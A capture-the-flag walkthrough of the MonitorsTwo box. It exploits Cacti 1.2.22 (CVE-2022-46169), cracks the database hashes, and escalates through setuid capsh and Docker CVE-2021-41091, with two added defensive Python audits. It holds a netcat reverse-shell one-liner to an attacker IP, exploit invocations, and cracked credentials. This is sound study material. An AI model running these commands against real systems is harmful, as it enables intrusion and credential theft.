CTF MonitorsTwo

Nmap

nmap -p- -sVC monitors -vvvv

Output:

PORT   STATE SERVICE REASON  VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBH2y17GUe6keBxOcBGNkWsliFwTRwUtQB3NXEhTAFLziGDfCgBV7B9Hp6GQMPGQXqMk7nnveA8vUz0D7ug5n04A=
| 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKfXa+OM5/utlol5mJajysEsV4zb/L0BJ1lKxMPadPvR
80/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
|_http-title: Login to Cacti
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 4F12CCCD3C42A4A478F067337FE92794
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Open ports: 22 (SSH) and 80 (HTTP, Cacti login page).

Login page

Version 1.2.22 | (c) 2004-2023 - The Cacti Group

Subdirectory

gobuster dir -u http://monitors -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt


Only 301 redirects, keep for later.

Exploit

https://raw.githubusercontent.com/FredBrave/CVE-2022-46169-CACTI-1.2.22/main/CVE-2022-46169.py

python cactiRCE2 -u http://10.10.11.211 --LHOST=10.10.14.23 --LPORT=4546 

lse

[!] fst020 Uncommon setuid binaries........................................ yes!
---
/sbin/capsh
---

linpeas

╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory
apache2 process found (dump creds from memory as root)

/etc/hosts
172.19.0.3 50bca5e748b0

══╣ Possible private SSH keys were found!
/var/www/html/include/vendor/phpseclib/Crypt/RSA.php

╔══════════╣ Unexpected in root
/.dockerenv /entrypoint.sh

cat /entrypoint.sh

#!/bin/bash
set -ex

wait-for-it db:3306 -t 300 -- echo "database is connected"
if [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then
mysql --host=db --user=root --password=root cacti < /var/www/html/cacti.sql
mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"
mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"
fi

chown www-data:www-data -R /var/www/html
# first arg is `-f` or `--some-option`
if [ "${1#-}" != "$1" ]; then
set -- apache2-foreground "$@"
fi

exec "$@"

/var/www/html/cacti.sql
mysql Ver 15.1 Distrib 10.5.15-MariaDB, for debian-linux-gnu (x86_64) using EditLine wrapper

I can manipulate the SQL file; I should be able to spawn a shell.
https://gtfobins.github.io/gtfobins/mysql/

http://monitors/cacti.sql

--
-- Dumping data for table `user_auth`
--

INSERT INTO user_auth VALUES (1,'admin','21232f297a57a5a743894a0e4a801fc3',0,'Administrator','','on','on','on','on','on','on',2,1,1,1,1,'on',-1,-1,'-1','',0,0,0);
INSERT INTO user_auth VALUES (3,'guest','43e9a4ab75570f5b',0,'Guest Account','','on','on','on','on','on',3,1,1,1,1,1,'',-1,-1,'-1','',0,0,0);

21232f297a57a5a743894a0e4a801fc3 = md5("admin"), the unsalted MD5 of the default admin password

Inside cacti.sql

!!rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.23 4545 >/tmp/f

Download it into the container from the attacker box

www-data@50bca5e748b0:/var/www/html$ wget http://10.10.14.23/cacti.sql
mysql --host=db --user=root --password=root cacti -e "SELECT LOAD_FILE('/etc/passwd') AS Result;"

mysql --host=db --user=root --password=root cacti -e "SELECT LOAD_FILE('../../../../../../etc/passwd');"

can’t do shit

mysql --host=db --user=root --password=root cacti -e "show tables"

mysql --host=db --user=root --password=root cacti -e "SELECT * FROM user_auth"
mysql --host=db --user=root --password=root cacti -e "SELECT username, password FROM user_auth"

+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC |
| guest    | 43e9a4ab75570f5b                                             |
| marcus   | $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C |
+----------+--------------------------------------------------------------+
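Added check, not part of the original writeup: a small Python audit over user_auth rows like the ones above, reporting which accounts still store an unsalted MD5 (the scheme in the shipped cacti.sql) instead of bcrypt (what the live database holds for admin and marcus), and whether an MD5 account still uses its own username as password, which is exactly what the admin value 21232f297a57a5a743894a0e4a801fc3 is. The sample rows are constructed from the two INSERT statements above plus a row for marcus around the bcrypt value from the table; marcus's other columns are assumed.

```python
import hashlib
import re

# Constructed sample: the admin and guest rows as they appear in the shipped
# cacti.sql, plus a row for marcus built around the bcrypt value the live DB
# returned (the remaining columns of that row are assumed, not from the dump).
SAMPLE_DUMP = """
INSERT INTO user_auth VALUES (1,'admin','21232f297a57a5a743894a0e4a801fc3',0,'Administrator','','on','on','on','on','on','on',2,1,1,1,1,'on',-1,-1,'-1','',0,0,0);
INSERT INTO user_auth VALUES (3,'guest','43e9a4ab75570f5b',0,'Guest Account','','on','on','on','on','on',3,1,1,1,1,1,'',-1,-1,'-1','',0,0,0);
INSERT INTO user_auth VALUES (4,'marcus','$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C',0,'Marcus','','on','on','on','on','on','on',2,1,1,1,1,'',-1,-1,'-1','',0,0,0);
"""

# id, username and password are the first three columns of user_auth.
ROW_RE = re.compile(r"INSERT INTO user_auth VALUES \((\d+),'([^']*)','([^']*)'")

def classify_hash(value):
    """Name the storage scheme from the shape of the stored value."""
    if re.match(r"\$2[aby]\$\d{2}\$", value):
        return "bcrypt"            # salted, adaptive cost: what current Cacti writes
    if re.fullmatch(r"[0-9a-f]{32}", value):
        return "md5"               # unsalted MD5, as in the shipped cacti.sql
    if re.fullmatch(r"[0-9a-f]{16}", value):
        return "legacy-16hex"      # old 16-hex form (guest row); treat as weak
    return "unknown"

def parse_user_auth(dump):
    return [{"id": int(m[1]), "username": m[2], "password": m[3]}
            for m in ROW_RE.finditer(dump)]

def audit_user_auth(dump):
    """One finding per account: scheme, whether it must be re-hashed on next
    login, and whether an MD5 account still equals md5(username), i.e. the
    admin/admin install default."""
    findings = []
    for row in parse_user_auth(dump):
        scheme = classify_hash(row["password"])
        default = (scheme == "md5" and
                   hashlib.md5(row["username"].encode()).hexdigest() == row["password"])
        findings.append({"username": row["username"], "scheme": scheme,
                         "needs_rehash": scheme != "bcrypt",
                         "default_password": default})
    return findings

if __name__ == "__main__":
    for finding in audit_user_auth(SAMPLE_DUMP):
        print(finding)
```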

John

cat hashs 
$2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC
$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C
john -wordlist=/usr/share/wordlists/rockyou.txt hashs


funkymonkey

ssh as marcus

ssh marcus@monitors
password: funkymonkey
python2.7 -m SimpleHTTPServer 80 
wget http://10.10.14.23/lse.sh
wget http://10.10.14.23/linpeas.sh
chmod +x *
./lse.sh
./linpeas.sh
Sudo version 1.8.31

new vhost, add to /etc/hosts

tail -1 /etc/hosts

10.10.11.211    monitors cacti.monitorstwo.htb monitorstwo.htb
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/gettext.sh
/usr/bin/rescan-scsi-bus.sh

/usr/bin/gettext.sh

marcus@monitorstwo:/var/www/html$ /usr/bin/gettext.sh 
GNU gettext shell script function library version 0.19.8.1
Usage: . gettext.sh

Docker version 20.10.5+dfsg1, build 363e9a8

https://github.com/UncleJ4ck/CVE-2021-41091

Go back to the container

Be root

/sbin/capsh --gid=0 --uid=0 --
chmod u+s /bin/bash

On Kali

./exp.sh
./bin/bash -p
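Host-side check for the exposure used above (added example; not from the writeup or the linked repository). CVE-2021-41091 is the combination of a Docker data root that unprivileged users can traverse and a setuid binary inside a container's overlay root filesystem, which is why chmod u+s /bin/bash in the container followed by bash -p on the host gives root. Patched daemons create the data root with the other-execute bit cleared (0710). This audit reports both conditions; the data-root path is a parameter and the directory tree it runs on here is constructed in a temp dir, not a real /var/lib/docker.

```python
import os
import stat
import tempfile
from pathlib import Path

def data_root_world_traversable(data_root):
    """True when 'other' has the execute (traverse) bit on the Docker data
    root; patched daemons create it 0710 so non-root users cannot descend."""
    return bool(stat.S_IMODE(os.stat(data_root).st_mode) & stat.S_IXOTH)

def setuid_files_in_overlays(data_root):
    """Regular files carrying setuid/setgid bits under overlay2/*/merged,
    i.e. inside container root filesystems that live on the host disk."""
    found = []
    overlay = Path(data_root) / "overlay2"
    if not overlay.is_dir():
        return found
    for merged in overlay.glob("*/merged"):
        for dirpath, _dirs, files in os.walk(merged):
            for name in files:
                path = Path(dirpath) / name
                try:
                    st = path.lstat()
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                    found.append(str(path.relative_to(merged)))
    return sorted(found)

def audit_docker_root(data_root):
    """Both conditions together are what gave host root in the writeup."""
    return {"world_traversable": data_root_world_traversable(data_root),
            "setuid_files": setuid_files_in_overlays(data_root)}

def build_sample_root(vulnerable=True):
    """Constructed stand-in for /var/lib/docker (not a real data dir): one
    container layer whose bin/bash has been chmod u+s, as on the box."""
    base = Path(tempfile.mkdtemp(prefix="dockerroot-"))
    bindir = base / "overlay2" / "deadbeef" / "merged" / "bin"
    bindir.mkdir(parents=True)
    (bindir / "bash").write_bytes(b"#!/bin/sh\n")
    (bindir / "bash").chmod(0o4755)          # setuid, like chmod u+s /bin/bash
    (bindir / "ls").write_bytes(b"#!/bin/sh\n")
    (bindir / "ls").chmod(0o755)             # ordinary binary, must not be reported
    base.chmod(0o711 if vulnerable else 0o710)   # unpatched vs patched data root
    return base

if __name__ == "__main__":
    for flag in (True, False):
        print(audit_docker_root(build_sample_root(vulnerable=flag)))
```

Run it as root against the real data root (`audit_docker_root("/var/lib/docker")`) to check a host; a non-empty setuid list on a traversable root is the finding to act on.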